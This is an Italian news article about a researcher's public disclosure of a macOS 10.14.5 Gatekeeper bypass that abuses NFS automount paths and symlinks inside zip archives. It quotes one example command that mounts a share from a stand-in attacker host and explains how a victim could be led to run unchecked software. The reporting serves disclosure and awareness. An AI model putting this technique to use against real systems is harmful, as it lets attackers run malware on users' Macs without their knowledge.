Chiudi l'annuncio

Il ricercatore di sicurezza Filippo Cavallarin ha pubblicato un avviso sul bug in macOS 10.14.5 sul suo blog. Questa consiste nella possibilità di aggirare completamente le misure di sicurezza di Gatekeeper. Secondo Cavallarin, ha segnalato l'errore ad Apple già nel febbraio di quest'anno, ma l'azienda non lo ha risolto nell'ultimo aggiornamento.

Gatekeeper è stato sviluppato da Apple e incorporato per la prima volta nel suo sistema operativo desktop nel 2012. Si tratta di un meccanismo che impedisce l'esecuzione di un'applicazione all'insaputa e al consenso dell'utente. Dopo aver scaricato un'app, Gatekeeper ne controlla automaticamente il codice per verificare se il software è firmato correttamente da Apple.

Nel suo post sul blog, Cavallarin afferma che Gatekeeper, per impostazione predefinita, considera sia l'archiviazione esterna che le condivisioni di rete come luoghi sicuri. Qualunque applicazione che risieda in questi target potrà quindi essere lanciata automaticamente senza dover passare attraverso il controllo del Gatekeeper. È questa caratteristica che può essere sfruttata per lanciare software dannoso all'insaputa dell'utente.

Un aspetto che consente l'accesso non autorizzato è la funzionalità di montaggio automatico, che consente agli utenti di montare automaticamente una condivisione di rete semplicemente specificando un percorso che inizia con "/net/". Cavallarin cita ad esempio il percorso "ls /net/evil-attacker.com/sharedfolder/" che può far sì che il sistema operativo carichi il contenuto di una cartella "sharefolder" in una posizione remota che può essere potenzialmente dannosa.

Puoi guardare il modo in cui funziona la minaccia nel video:

Un altro fattore è il fatto che se viene condiviso un archivio zip contenente uno specifico collegamento simbolico che porta alla funzione di montaggio automatico, non verrà controllato da Gatekeeper. In questo modo, la vittima può facilmente scaricare l'archivio dannoso e decomprimerlo, consentendo all'aggressore di eseguire praticamente qualsiasi software sul Mac all'insaputa dell'utente. Anche il Finder, che nasconde alcune estensioni per impostazione predefinita, ha la sua parte di questa vulnerabilità.

Cavallarin afferma sul suo blog che Apple ha attirato l'attenzione sulla vulnerabilità del sistema operativo macOS il 22 febbraio di quest'anno. Ma a metà maggio Apple ha smesso di comunicare con Cavallarin, quindi Cavallarin ha deciso di rendere pubblica la cosa.

mac-finder-kit

Fonte: FCVL

.